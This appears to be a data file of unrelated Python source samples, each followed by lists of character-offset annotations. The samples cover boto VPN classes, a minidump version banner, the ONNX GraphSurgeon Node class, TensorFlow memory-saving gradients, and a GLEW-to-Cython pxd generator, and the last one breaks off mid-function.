self.available = state
def __repr__(self):
return 'VpnStaticRoute: %s' % self.destination_cidr_block
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'destinationCidrBlock':
self.destination_cidr_block = value
elif name == 'source':
self.source = value
elif name == 'state':
self.state = value
else:
setattr(self, name, value)
class VpnTunnel(object):
"""
Represents telemetry for a VPN tunnel
:ivar outside_ip_address: The Internet-routable IP address of the
virtual private gateway's outside interface.
:ivar status: The status of the VPN tunnel. Valid values: UP | DOWN
:ivar last_status_change: The date and time of the last change in status.
:ivar status_message: If an error occurs, a description of the error.
:ivar accepted_route_count: The number of accepted routes.
"""
def __init__(self, outside_ip_address=None, status=None, last_status_change=None,
status_message=None, accepted_route_count=None):
self.outside_ip_address = outside_ip_address
self.status = status
self.last_status_change = last_status_change
self.status_message = status_message
self.accepted_route_count = accepted_route_count
def __repr__(self):
return 'VpnTunnel: %s' % self.outside_ip_address
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'outsideIpAddress':
self.outside_ip_address = value
elif name == 'status':
self.status = value
elif name == 'lastStatusChange':
self.last_status_change = datetime.strptime(value,
'%Y-%m-%dT%H:%M:%S.%fZ')
elif name == 'statusMessage':
self.status_message = value
elif name == 'acceptedRouteCount':
try:
value = int(value)
except ValueError:
boto.log.warning('Error converting code (%s) to int' % value)
self.accepted_route_count = value
else:
setattr(self, name, value)
class VpnConnection(TaggedEC2Object):
"""
Represents a VPN Connection
:ivar id: The ID of the VPN connection.
:ivar state: The current state of the VPN connection.
Valid values: pending | available | deleting | deleted
:ivar customer_gateway_configuration: The configuration information for the
VPN connection's customer gateway (in the native XML format). This
element is always present in the
:class:`boto.vpc.VPCConnection.create_vpn_connection` response;
however, it's present in the
:class:`boto.vpc.VPCConnection.get_all_vpn_connections` response only
if the VPN connection is in the pending or available state.
:ivar type: The type of VPN connection (ipsec.1).
:ivar customer_gateway_id: The ID of the customer gateway at your end of
the VPN connection.
:ivar vpn_gateway_id: The ID of the virtual private gateway
at the AWS side of the VPN connection.
:ivar tunnels: A list of the vpn tunnels (always 2)
:ivar options: The option set describing the VPN connection.
:ivar static_routes: A list of static routes associated with a VPN
connection.
"""
def __init__(self, connection=None):
super(VpnConnection, self).__init__(connection)
self.id = None
self.state = None
self.customer_gateway_configuration = None
self.type = None
self.customer_gateway_id = None
self.vpn_gateway_id = None
self.tunnels = []
self.options = None
self.static_routes = []
def __repr__(self):
return 'VpnConnection:%s' % self.id
def startElement(self, name, attrs, connection):
retval = super(VpnConnection, self).startElement(name, attrs, connection)
if retval is not None:
return retval
if name == 'vgwTelemetry':
self.tunnels = ResultSet([('item', VpnTunnel)])
return self.tunnels
elif name == 'routes':
self.static_routes = ResultSet([('item', VpnStaticRoute)])
return self.static_routes
elif name == 'options':
self.options = VpnConnectionOptions()
return self.options
return None
def endElement(self, name, value, connection):
if name == 'vpnConnectionId':
self.id = value
elif name == 'state':
self.state = value
elif name == 'customerGatewayConfiguration':
self.customer_gateway_configuration = value
elif name == 'type':
self.type = value
elif name == 'customerGatewayId':
self.customer_gateway_id = value
elif name == 'vpnGatewayId':
self.vpn_gateway_id = value
else:
setattr(self, name, value)
def delete(self, dry_run=False):
return self.connection.delete_vpn_connection(
self.id,
dry_run=dry_run
)
| [
[
[
1110,
1114
],
[
4757,
4761
]
],
[
[
1136,
1144
],
[
4447,
4455
]
],
[
[
1172,
1181
],
[
6812,
6821
],
[
6941,
6950
]
],
[
[
1252,
1267
],
[
4939,
4954
]
],
[
[
1275,
1295
],
[
7076,
7096
]
],
[
[
2133,
2147
],
[
6961,
6975
]
],
[
[
3143,
3152
],
[
6832,
6841
]
],
[
[
4925,
4938
],
[
6160,
6173
],
[
6634,
6647
]
]
] |
__version__ = "0.0.18"
__banner__ = \
"""
# minidump %s
# Author: Tamas Jos @skelsec (skelsecprojects@gmail.com)
""" % __version__ | [
[
[
1,
12
],
[
121,
132
]
],
[
[
24,
34
]
]
] |
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from onnx_graphsurgeon.logger.logger import G_LOGGER
from onnx_graphsurgeon.ir.tensor import Tensor
from onnx_graphsurgeon.util import misc
from collections import OrderedDict
from typing import List, Dict
class Node(object):
def __init__(
self,
op: str,
name: str = None,
attrs: Dict[str, object] = None,
inputs: List["Tensor"] = None,
outputs: List["Tensor"] = None,
):
"""
A node represents an operation in a graph, and consumes zero or more Tensors, and produces zero or more Tensors.
Args:
op (str): The operation this node performs.
name (str): The name of this node.
attrs (Dict[str, object]): A dictionary that maps attribute names to their values.
inputs (List[Tensor]): A list of zero or more input Tensors.
outputs (List[Tensor]): A list of zero or more output Tensors.
"""
self.op = op
self.name = misc.default_value(name, "")
self.attrs = misc.default_value(attrs, OrderedDict())
self.inputs = misc.SynchronizedList(self, field_name="outputs", initial=misc.default_value(inputs, []))
self.outputs = misc.SynchronizedList(self, field_name="inputs", initial=misc.default_value(outputs, []))
def i(self, tensor_idx=0, producer_idx=0):
"""
Convenience function to get a producer node of one of this node's input tensors.
Note that the parameters are swapped compared to the o() function; this is because tensors are likely to have only a single producer
For example:
::
assert node.i() == node.inputs[0].inputs[0]
assert node.i(1, 2) == node.inputs[1].inputs[2]
Args:
tensor_idx (int): The index of the input tensor of this node. Defaults to 0.
producer_idx (int): The index of the producer of the input tensor, if the tensor has multiple producers. Defaults to 0
Returns:
Node: The specified producer (input) node.
"""
return self.inputs[tensor_idx].inputs[producer_idx]
def o(self, consumer_idx=0, tensor_idx=0):
"""
Convenience function to get a consumer node of one of this node's output tensors.
For example:
::
assert node.o() == node.outputs[0].outputs[0]
assert node.o(2, 1) == node.outputs[1].outputs[2]
Args:
consumer_idx (int): The index of the consumer of the input tensor. Defaults to 0.
tensor_idx (int): The index of the output tensor of this node, if the node has multiple outputs. Defaults to 0.
Returns:
Node: The specified consumer (output) node
"""
return self.outputs[tensor_idx].outputs[consumer_idx]
def __setattr__(self, name, value):
if name in ["inputs", "outputs"]:
try:
getattr(self, name).clear()
getattr(self, name).extend(value)
except AttributeError:
super().__setattr__(name, value)
else:
super().__setattr__(name, value)
def copy(self, inputs: List["Tensor"] = None, outputs: List["Tensor"] = None, tensor_map=None):
"""
Makes a shallow copy of this node, overriding input and output information.
Note: Generally, you should only ever make a copy of a Graph.
"""
from onnx_graphsurgeon.ir.graph import Graph
new_attrs = OrderedDict()
for name, attr in self.attrs.items():
if isinstance(attr, Graph):
new_attrs[name] = attr.copy(tensor_map)
else:
new_attrs[name] = attr
return Node(self.op, self.name, new_attrs, inputs=inputs, outputs=outputs)
def __str__(self):
ret = "{:} ({:})".format(self.name, self.op)
def add_io(name, io):
nonlocal ret
ret += "\n\t{:}: [".format(name)
for elem in io:
ret += "\n\t\t{:}".format(elem)
ret += "\n\t]"
add_io("Inputs", self.inputs)
add_io("Outputs", self.outputs)
if self.attrs:
ret += "\nAttributes: {:}".format(self.attrs)
return ret
def __repr__(self):
return self.__str__()
def __eq__(self, other):
"""
Check whether two nodes are equal by comparing name, attributes, op, inputs, and outputs.
"""
G_LOGGER.verbose("Comparing node: {:} with {:}".format(self.name, other.name))
attrs_match = self.name == other.name and self.op == other.op and self.attrs == other.attrs
inputs_match = len(self.inputs) == len(other.inputs) and all(
[inp == other_inp for inp, other_inp in zip(self.inputs, other.inputs)]
)
outputs_match = len(self.outputs) == len(other.outputs) and all(
[out == other_out for out, other_out in zip(self.outputs, other.outputs)]
)
return attrs_match and inputs_match and outputs_match
| [
[
[
733,
741
],
[
5152,
5160
]
],
[
[
782,
788
]
],
[
[
824,
828
],
[
1668,
1672
],
[
1718,
1722
],
[
1781,
1785
],
[
1839,
1843
],
[
1894,
1898
],
[
1951,
1955
]
],
[
[
854,
865
],
[
1744,
1755
],
[
4179,
4190
]
],
[
[
885,
889
],
[
1050,
1054
],
[
1090,
1094
],
[
3853,
3857
],
[
3885,
3889
]
],
[
[
891,
895
],
[
1008,
1012
]
],
[
[
904,
908
],
[
4408,
4412
]
]
] |
from toposort import toposort
import contextlib
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
import time
import sys
sys.setrecursionlimit(10000)
# refers back to current module if we decide to split helpers out
util = sys.modules[__name__]
# getting rid of "WARNING:tensorflow:VARIABLES collection name is deprecated"
setattr(tf.GraphKeys, "VARIABLES", "variables")
# save original gradients since tf.gradient could be monkey-patched to point
# to our version
from tensorflow.python.ops import gradients as tf_gradients_lib
tf_gradients = tf_gradients_lib.gradients
MIN_CHECKPOINT_NODE_SIZE=1024 # use lower value during testing
# specific versions we can use to do process-wide replacement of tf.gradients
def gradients_speed(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='speed', **kwargs)
def gradients_memory(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='memory', **kwargs)
def gradients_collection(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='collection', **kwargs)
def gradients(ys, xs, grad_ys=None, checkpoints='collection', **kwargs):
'''
Authors: Tim Salimans & Yaroslav Bulatov
memory efficient gradient implementation inspired by "Training Deep Nets with Sublinear Memory Cost"
by Chen et al. 2016 (https://arxiv.org/abs/1604.06174)
ys,xs,grad_ys,kwargs are the arguments to standard tensorflow tf.gradients
(https://www.tensorflow.org/versions/r0.12/api_docs/python/train.html#gradients)
'checkpoints' can either be
- a list consisting of tensors from the forward pass of the neural net
that we should re-use when calculating the gradients in the backward pass
all other tensors that do not appear in this list will be re-computed
- a string specifying how this list should be determined. currently we support
- 'speed': checkpoint all outputs of convolutions and matmuls. these ops are usually the most expensive,
so checkpointing them maximizes the running speed
(this is a good option if nonlinearities, concats, batchnorms, etc are taking up a lot of memory)
- 'memory': try to minimize the memory usage
(currently using a very simple strategy that identifies a number of bottleneck tensors in the graph to checkpoint)
- 'collection': look for a tensorflow collection named 'checkpoints', which holds the tensors to checkpoint
'''
# print("Calling memsaving gradients with", checkpoints)
if not isinstance(ys,list):
ys = [ys]
if not isinstance(xs,list):
xs = [xs]
bwd_ops = ge.get_backward_walk_ops([y.op for y in ys],
inclusive=True)
debug_print("bwd_ops: %s", bwd_ops)
# forward ops are all ops that are candidates for recomputation
fwd_ops = ge.get_forward_walk_ops([x.op for x in xs],
inclusive=True,
within_ops=bwd_ops)
debug_print("fwd_ops: %s", fwd_ops)
# exclude ops with no inputs
fwd_ops = [op for op in fwd_ops if op.inputs]
# don't recompute xs, remove variables
xs_ops = _to_ops(xs)
fwd_ops = [op for op in fwd_ops if not op in xs_ops]
fwd_ops = [op for op in fwd_ops if not '/assign' in op.name]
fwd_ops = [op for op in fwd_ops if not '/Assign' in op.name]
fwd_ops = [op for op in fwd_ops if not '/read' in op.name]
ts_all = ge.filter_ts(fwd_ops, True) # get the tensors
ts_all = [t for t in ts_all if '/read' not in t.name]
ts_all = set(ts_all) - set(xs) - set(ys)
# construct list of tensors to checkpoint during forward pass, if not
# given as input
if type(checkpoints) is not list:
if checkpoints == 'collection':
checkpoints = tf.get_collection('checkpoints')
elif checkpoints == 'speed':
# checkpoint all expensive ops to maximize running speed
checkpoints = ge.filter_ts_from_regex(fwd_ops, 'conv2d|Conv|MatMul')
elif checkpoints == 'memory':
# remove very small tensors and some weird ops
def fixdims(t): # tf.Dimension values are not compatible with int, convert manually
try:
return [int(e if e.value is not None else 64) for e in t]
except:
return [0] # unknown shape
ts_all = [t for t in ts_all if np.prod(fixdims(t.shape)) > MIN_CHECKPOINT_NODE_SIZE]
ts_all = [t for t in ts_all if 'L2Loss' not in t.name]
ts_all = [t for t in ts_all if 'entropy' not in t.name]
ts_all = [t for t in ts_all if 'FusedBatchNorm' not in t.name]
ts_all = [t for t in ts_all if 'Switch' not in t.name]
ts_all = [t for t in ts_all if 'dropout' not in t.name]
# DV: FP16_FIX - need to add 'Cast' layer here to make it work for FP16
ts_all = [t for t in ts_all if 'Cast' not in t.name]
# filter out all tensors that are inputs of the backward graph
with util.capture_ops() as bwd_ops:
tf_gradients(ys, xs, grad_ys, **kwargs)
bwd_inputs = [t for op in bwd_ops for t in op.inputs]
# list of tensors in forward graph that is in input to bwd graph
ts_filtered = list(set(bwd_inputs).intersection(ts_all))
debug_print("Using tensors %s", ts_filtered)
# try two slightly different ways of getting bottlenecks tensors
# to checkpoint
for ts in [ts_filtered, ts_all]:
# get all bottlenecks in the graph
bottleneck_ts = []
for t in ts:
b = set(ge.get_backward_walk_ops(t.op, inclusive=True, within_ops=fwd_ops))
f = set(ge.get_forward_walk_ops(t.op, inclusive=False, within_ops=fwd_ops))
# check that there are not shortcuts
b_inp = set([inp for op in b for inp in op.inputs]).intersection(ts_all)
f_inp = set([inp for op in f for inp in op.inputs]).intersection(ts_all)
if not set(b_inp).intersection(f_inp) and len(b_inp)+len(f_inp) >= len(ts_all):
bottleneck_ts.append(t) # we have a bottleneck!
else:
debug_print("Rejected bottleneck candidate and ops %s", [t] + list(set(ts_all) - set(b_inp) - set(f_inp)))
# success? or try again without filtering?
if len(bottleneck_ts) >= np.sqrt(len(ts_filtered)): # yes, enough bottlenecks found!
break
if not bottleneck_ts:
raise Exception('unable to find bottleneck tensors! please provide checkpoint nodes manually, or use checkpoints="speed".')
# sort the bottlenecks
bottlenecks_sorted_lists = tf_toposort(bottleneck_ts, within_ops=fwd_ops)
sorted_bottlenecks = [t for ts in bottlenecks_sorted_lists for t in ts]
# save an approximately optimal number ~ sqrt(N)
N = len(ts_filtered)
if len(bottleneck_ts) <= np.ceil(np.sqrt(N)):
checkpoints = sorted_bottlenecks
else:
step = int(np.ceil(len(bottleneck_ts) / np.sqrt(N)))
checkpoints = sorted_bottlenecks[step::step]
else:
raise Exception('%s is unsupported input for "checkpoints"' % (checkpoints,))
checkpoints = list(set(checkpoints).intersection(ts_all))
# at this point automatic selection happened and checkpoints is list of nodes
assert isinstance(checkpoints, list)
debug_print("Checkpoint nodes used: %s", checkpoints)
# better error handling of special cases
# xs are already handled as checkpoint nodes, so no need to include them
xs_intersect_checkpoints = set(xs).intersection(set(checkpoints))
if xs_intersect_checkpoints:
debug_print("Warning, some input nodes are also checkpoint nodes: %s",
xs_intersect_checkpoints)
ys_intersect_checkpoints = set(ys).intersection(set(checkpoints))
debug_print("ys: %s, checkpoints: %s, intersect: %s", ys, checkpoints,
ys_intersect_checkpoints)
# saving an output node (ys) gives no benefit in memory while creating
# new edge cases, exclude them
if ys_intersect_checkpoints:
debug_print("Warning, some output nodes are also checkpoints nodes: %s",
format_ops(ys_intersect_checkpoints))
# remove initial and terminal nodes from checkpoints list if present
checkpoints = list(set(checkpoints) - set(ys) - set(xs))
# check that we have some nodes to checkpoint
if not checkpoints:
raise Exception('no checkpoints nodes found or given as input! ')
# disconnect dependencies between checkpointed tensors
checkpoints_disconnected = {}
for x in checkpoints:
if x.op and x.op.name is not None:
grad_node = tf.stop_gradient(x, name=x.op.name+"_sg")
else:
grad_node = tf.stop_gradient(x)
checkpoints_disconnected[x] = grad_node
# partial derivatives to the checkpointed tensors and xs
ops_to_copy = fast_backward_ops(seed_ops=[y.op for y in ys],
stop_at_ts=checkpoints, within_ops=fwd_ops)
debug_print("Found %s ops to copy within fwd_ops %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ys], checkpoints)
debug_print("ops_to_copy = %s", ops_to_copy)
debug_print("Processing list %s", ys)
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected.values(), checkpoints_disconnected.keys(), can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected.values(), checkpoints_disconnected.keys(), copied_ops)
# get gradients with respect to current boundary + original x's
copied_ys = [info._transformed_ops[y.op]._outputs[0] for y in ys]
boundary = list(checkpoints_disconnected.values())
dv = tf_gradients(ys=copied_ys, xs=boundary+xs, grad_ys=grad_ys, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", copied_ys)
debug_print("with respect to %s", boundary+xs)
inputs_to_do_before = [y.op for y in ys]
if grad_ys is not None:
inputs_to_do_before += grad_ys
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
# dictionary of "node: backprop" for nodes in the boundary
d_checkpoints = {r: dr for r,dr in zip(checkpoints_disconnected.keys(),
dv[:len(checkpoints_disconnected)])}
# partial derivatives to xs (usually the params of the neural net)
d_xs = dv[len(checkpoints_disconnected):]
# incorporate derivatives flowing through the checkpointed nodes
checkpoints_sorted_lists = tf_toposort(checkpoints, within_ops=fwd_ops)
for ts in checkpoints_sorted_lists[::-1]:
debug_print("Processing list %s", ts)
checkpoints_other = [r for r in checkpoints if r not in ts]
checkpoints_disconnected_other = [checkpoints_disconnected[r] for r in checkpoints_other]
# copy part of the graph below current checkpoint node, stopping at
# other checkpoints nodes
ops_to_copy = fast_backward_ops(within_ops=fwd_ops, seed_ops=[r.op for r in ts], stop_at_ts=checkpoints_other)
debug_print("Found %s ops to copy within %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ts],
checkpoints_other)
debug_print("ops_to_copy = %s", ops_to_copy)
if not ops_to_copy: # we're done!
break
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected_other, checkpoints_other, can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected_other, checkpoints_other, copied_ops)
# gradient flowing through the checkpointed node
boundary = [info._transformed_ops[r.op]._outputs[0] for r in ts]
substitute_backprops = [d_checkpoints[r] for r in ts]
dv = tf_gradients(boundary,
checkpoints_disconnected_other+xs,
grad_ys=substitute_backprops, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", boundary)
debug_print("with respect to %s", checkpoints_disconnected_other+xs)
debug_print("with boundary backprop substitutions %s", substitute_backprops)
inputs_to_do_before = [d_checkpoints[r].op for r in ts]
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
for r, dr in zip(checkpoints_other, dv[:len(checkpoints_other)]):
if dr is not None:
if d_checkpoints[r] is None:
d_checkpoints[r] = dr
else:
d_checkpoints[r] += dr
def _unsparsify(x):
if not isinstance(x, tf.IndexedSlices):
return x
assert x.dense_shape is not None, "memory_saving_gradients encountered sparse gradients of unknown shape"
indices = x.indices
while indices.shape.ndims < x.values.shape.ndims:
indices = tf.expand_dims(indices, -1)
return tf.scatter_nd(indices, x.values, x.dense_shape)
# partial derivatives to xs (usually the params of the neural net)
d_xs_new = dv[len(checkpoints_other):]
for j in range(len(xs)):
if d_xs_new[j] is not None:
if d_xs[j] is None:
d_xs[j] = _unsparsify(d_xs_new[j])
else:
d_xs[j] += _unsparsify(d_xs_new[j])
return d_xs
def tf_toposort(ts, within_ops=None):
all_ops = ge.get_forward_walk_ops([x.op for x in ts], within_ops=within_ops)
deps = {}
for op in all_ops:
for o in op.outputs:
deps[o] = set(op.inputs)
sorted_ts = toposort(deps)
# only keep the tensors from our original list
ts_sorted_lists = []
for l in sorted_ts:
keep = list(set(l).intersection(ts))
if keep:
ts_sorted_lists.append(keep)
return ts_sorted_lists
def fast_backward_ops(within_ops, seed_ops, stop_at_ts):
bwd_ops = set(ge.get_backward_walk_ops(seed_ops, stop_at_ts=stop_at_ts))
ops = bwd_ops.intersection(within_ops).difference([t.op for t in stop_at_ts])
return list(ops)
@contextlib.contextmanager
def capture_ops():
"""Decorator to capture ops created in the block.
with capture_ops() as ops:
# create some ops
print(ops) # => prints ops created.
"""
micros = int(time.time()*10**6)
scope_name = str(micros)
op_list = []
with tf.name_scope(scope_name):
yield op_list
g = tf.get_default_graph()
op_list.extend(ge.select_ops(scope_name+"/.*", graph=g))
def _to_op(tensor_or_op):
if hasattr(tensor_or_op, "op"):
return tensor_or_op.op
return tensor_or_op
def _to_ops(iterable):
if not _is_iterable(iterable):
return iterable
return [_to_op(i) for i in iterable]
def _is_iterable(o):
try:
_ = iter(o)
except Exception:
return False
return True
DEBUG_LOGGING=False
def debug_print(s, *args):
"""Like logger.log, but also replaces all TensorFlow ops/tensors with their
names. Sensitive to value of DEBUG_LOGGING, see enable_debug/disable_debug
Usage:
debug_print("see tensors %s for %s", tensorlist, [1,2,3])
"""
if DEBUG_LOGGING:
formatted_args = [format_ops(arg) for arg in args]
print("DEBUG "+s % tuple(formatted_args))
def format_ops(ops, sort_outputs=True):
"""Helper method for printing ops. Converts Tensor/Operation op to op.name,
rest to str(op)."""
if hasattr(ops, '__iter__') and not isinstance(ops, str):
l = [(op.name if hasattr(op, "name") else str(op)) for op in ops]
if sort_outputs:
return sorted(l)
return l
else:
return ops.name if hasattr(ops, "name") else str(ops)
def my_add_control_inputs(wait_to_do_ops, inputs_to_do_before):
for op in wait_to_do_ops:
ci = [i for i in inputs_to_do_before if op.control_inputs is None or i not in op.control_inputs]
ge.add_control_inputs(op, ci)
| [
[
[
21,
29
],
[
15110,
15118
]
],
[
[
37,
47
],
[
15597,
15607
]
],
[
[
55,
66
],
[
4630,
4632
],
[
6761,
6763
],
[
7360,
7362
],
[
7368,
7370
],
[
7475,
7477
],
[
7504,
7506
]
],
[
[
74,
90
],
[
370,
372
],
[
3976,
3978
],
[
9229,
9231
],
[
9309,
9311
],
[
15873,
15875
],
[
15925,
15927
],
[
14110,
14112
],
[
14392,
14394
],
[
14439,
14441
]
],
[
[
98,
135
],
[
2783,
2785
],
[
3011,
3013
],
[
3627,
3629
],
[
4154,
4156
],
[
5923,
5925
],
[
6019,
6021
],
[
9857,
9859
],
[
9889,
9891
],
[
10132,
10134
],
[
12389,
12391
],
[
12421,
12423
],
[
12684,
12686
],
[
14923,
14925
],
[
15433,
15435
],
[
15965,
15967
],
[
17339,
17341
]
],
[
[
143,
147
],
[
15805,
15809
]
],
[
[
155,
158
],
[
159,
162
],
[
261,
264
]
],
[
[
254,
258
],
[
5271,
5275
]
],
[
[
539,
568
],
[
584,
600
]
],
[
[
569,
581
],
[
5318,
5330
],
[
10598,
10610
],
[
13127,
13139
]
],
[
[
612,
636
],
[
4658,
4682
]
],
[
[
761,
776
]
],
[
[
884,
900
]
],
[
[
1017,
1037
]
],
[
[
1150,
1159
],
[
821,
830
],
[
945,
954
],
[
1082,
1091
]
],
[
[
14875,
14886
],
[
7097,
7108
],
[
11535,
11546
]
],
[
[
15362,
15379
],
[
9457,
9474
],
[
11971,
11988
]
],
[
[
15627,
15638
]
],
[
[
16012,
16018
],
[
16204,
16210
]
],
[
[
16122,
16129
],
[
3352,
3359
]
],
[
[
16238,
16250
],
[
16150,
16162
]
],
[
[
16330,
16343
],
[
16616,
16629
]
],
[
[
16354,
16365
],
[
2888,
2899
],
[
3171,
3182
],
[
5583,
5594
],
[
6553,
6564
],
[
7887,
7898
],
[
8174,
8185
],
[
8365,
8376
],
[
8629,
8640
],
[
9588,
9599
],
[
9747,
9758
],
[
9796,
9807
],
[
10072,
10083
],
[
10241,
10252
],
[
10672,
10683
],
[
10712,
10723
],
[
10749,
10760
],
[
11634,
11645
],
[
12076,
12087
],
[
12257,
12268
],
[
12620,
12631
],
[
12780,
12791
],
[
13285,
13296
],
[
13329,
13340
],
[
13369,
13380
],
[
13446,
13457
]
],
[
[
16737,
16747
],
[
8716,
8726
],
[
16653,
16663
]
],
[
[
17136,
17157
],
[
10989,
11010
],
[
13676,
13697
]
]
] |
"""
Script taken from: https://github.com/orlp/pygrafix
Appropriate Licence applies!
"""
import argparse
import os
import pathlib
import re
def generate_pxd(glew_header_loc, dest="."):
with open(glew_header_loc) as fin:
data = fin.read()
# cython doesn't support const
data = re.sub(r"\bconst\b", "", data)
lines = data.split("\n")
handled_lines = set()
function_types = {}
export_functions = {}
function_defs = []
enums = []
# read in function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"typedef\s+([^(]+)\([^*]+\*\s*([a-zA-Z_][a-zA-Z0-9_]+)\)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_types[result[1]] = (result[0].strip(), result[2])
handled_lines.add(linenr)
# read in exported functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLEW_FUN_EXPORT\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+([a-zA-Z_][a-zA-Z0-9_]+)",
line,
)[0]
except IndexError:
continue
export_functions[result[1]] = result[0]
handled_lines.add(linenr)
# match exported functions with function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_FUN\s*\(\s*([a-zA-Z_][a-zA-Z0-9_]+)\s*\)",
line,
)[0]
except IndexError:
continue
export_func = export_functions[result[1]]
function_defs.append(
function_types[export_func][0]
+ " "
+ result[0]
+ function_types[export_func][1]
)
handled_lines.add(linenr)
# add GLAPIENTRY functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLAPI\s+([a-zA-Z_][a-zA-Z0-9_]+)[^a-zA-Z_]+GLAPIENTRY[^a-zA-Z_]+([a-zA-Z_][a-zA-Z0-9_]+)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_defs.append(" ".join(result))
handled_lines.add(linenr)
# read in numeric defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+(?:(?:0x[0-9a-fA-F]+)|[0-9]+)",
line,
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# read in GLEW vars as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_VAR\(.+\)", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# also accept GL to GL defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+(GL_[a-zA-Z0-9_]+)\s+GL_[a-zA-Z0-9_]+", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
pxdheader = """# cython: language_level=3
from libc.stdint cimport int64_t, uint64_t
cdef extern from "include_glew.h":
ctypedef struct _cl_context:
pass
ctypedef struct _cl_event:
pass
ctypedef struct __GLsync:
pass
ctypedef unsigned short wchar_t
ctypedef int ptrdiff_t
ctypedef unsigned int GLenum
ctypedef unsigned int GLbitfield
ctypedef unsigned int GLuint
ctypedef int GLint
ctypedef int GLsizei
ctypedef char GLchar
ctypedef unsigned char GLboolean
ctypedef signed char GLbyte
ctypedef short GLshort
ctypedef unsigned char GLubyte
ctypedef unsigned short GLushort
ctypedef unsigned long GLulong
ctypedef float GLfloat
ctypedef float GLclampf
ctypedef double GLdouble
ctypedef double GLclampd
ctypedef int GLfixed
ctypedef int GLclampx
ctypedef void GLvoid
ctypedef int64_t GLint64EXT
ctypedef uint64_t GLuint64EXT
ctypedef GLint64EXT GLint64
ctypedef GLuint64EXT GLuint64
ctypedef __GLsync *GLsync
ctypedef char GLcharARB
ctypedef ptrdiff_t GLintptr
ctypedef ptrdiff_t GLsizeiptr
ctypedef _cl_context *cl_context
ctypedef _cl_event *cl_event
ctypedef unsigned int GLhandleARB
ctypedef ptrdiff_t GLintptrARB
ctypedef ptrdiff_t GLsizeiptrARB
ctypedef void* GLeglClientBufferEXT
ctypedef unsigned short GLhalf
ctypedef GLintptr GLvdpauSurfaceNV
ctypedef long GLVULKANPROCNV
ctypedef void *GLeglImageOES # GL_EXT_EGL_image_storage
ctypedef void (__stdcall *GLDEBUGPROCAMD)(GLuint id, GLenum category, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROCARB)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROC)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, const GLchar* message, GLvoid* userParam)
ctypedef void (__stdcall *GLLOGPROCREGAL)(GLenum stream, GLsizei length, const GLchar *message, GLvoid *context)
GLenum glewInit()
GLboolean glewIsSupported(char *name)
GLboolean glewIsExtensionSupported(char *name)
GLboolean glewGetExtension(char* name)
GLubyte *glewGetErrorString(GLenum error)
GLubyte *glewGetString(GLenum name)
"""
dest = pathlib.Path(dest)
dest.mkdir(exist_ok=True, parents=True)
with (dest / "glew.pxd").open("w") as fout:
data = pxdheader
data += " enum:\n"
data += "\n".join(" " + enum for enum in set(enums))
data += "\n\n"
def mod_func(func):
keywords = [
"and",
"del",
"for",
"is",
"raise",
"assert",
"elif",
"from",
"lambda",
"return",
"break",
"else",
"global",
"not",
"try",
"class",
"except",
"if",
"or",
"while",
"continue",
"exec",
"import",
"pass",
"yield",
"def",
"finally",
"in",
"print",
]
# beautify functions
